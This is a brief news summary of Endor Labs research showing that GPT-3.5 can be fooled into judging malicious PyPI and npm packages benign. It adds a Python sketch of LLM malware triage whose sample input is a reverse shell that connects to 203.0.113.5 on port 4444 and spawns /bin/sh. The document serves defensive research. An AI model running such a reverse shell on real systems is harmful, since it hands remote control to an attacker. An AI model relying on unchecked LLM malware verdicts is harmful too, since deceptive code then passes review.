"GPT Tricked by Analysts Into Believing Malware Is Benign"

Researchers have emphasized that Large Language Model (LLM)-driven malware assessments should not replace human analysis, because the Artificial Intelligence (AI) technology underlying them can be deceived and manipulated. They also warn that the prevalence of malicious packages in repositories such as PyPI and npm continues to rise. According to researchers from Endor Labs, the creation of fake accounts and the publication of malicious packages can be automated to such an extent that the marginal cost of creating and spreading a malicious package approaches zero. The company therefore ran an experiment in which it identified malicious packages by applying a combination of AI techniques to package source code and metadata. The researchers explained that the source code is examined for typical malware behaviors such as droppers, reverse shells, and information exfiltration; in the experiment, GPT-3.5 was queried about 1,874 artifacts. Although LLMs can be beneficial in day-to-day operations, Endor Labs concluded that they cannot replace human review. This article continues to discuss GPT being tricked into believing malware is benign.
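The workflow described above amounts to prompting an LLM with a package's source code and asking for a malicious-or-benign assessment. The sketch below is a minimal illustration of that idea, not Endor Labs' actual pipeline: it assumes the `openai` Python SDK (v1.x), an `OPENAI_API_KEY` environment variable, and a hypothetical prompt and helper function (`triage_package`).

```python
# Minimal sketch (not Endor Labs' pipeline) of asking GPT-3.5 to triage a
# package's source code for common malware behaviors such as droppers,
# reverse shells, and information exfiltration.
#
# Assumptions: the `openai` Python SDK (v1.x) is installed and the
# OPENAI_API_KEY environment variable is set; prompt wording is illustrative.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

PROMPT_TEMPLATE = (
    "You are a security analyst. Review the following package source code "
    "and state whether it appears malicious or benign. Look specifically "
    "for droppers, reverse shells, and information exfiltration.\n\n"
    "Package: {name}\n"
    "Source:\n{source}\n"
)


def triage_package(name: str, source: str) -> str:
    """Ask GPT-3.5 for a malicious/benign assessment of one artifact."""
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "user",
             "content": PROMPT_TEMPLATE.format(name=name, source=source)},
        ],
        temperature=0,  # keep the triage output as deterministic as possible
    )
    return response.choices[0].message.content


if __name__ == "__main__":
    # Hypothetical suspicious snippet: opens a reverse shell to a remote host.
    sample = (
        "import socket, subprocess\n"
        "s = socket.socket(); s.connect(('203.0.113.5', 4444))\n"
        "subprocess.call(['/bin/sh'], stdin=s.fileno(), stdout=s.fileno())\n"
    )
    print(triage_package("example-pkg", sample))
```

As the article stresses, an assessment like this can itself be deceived, for example by misleading comments or obfuscated code, so such output is best treated as a triage signal that still requires human review.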

Cybernews reports "GPT Tricked by Analysts Into Believing Malware Is Benign"
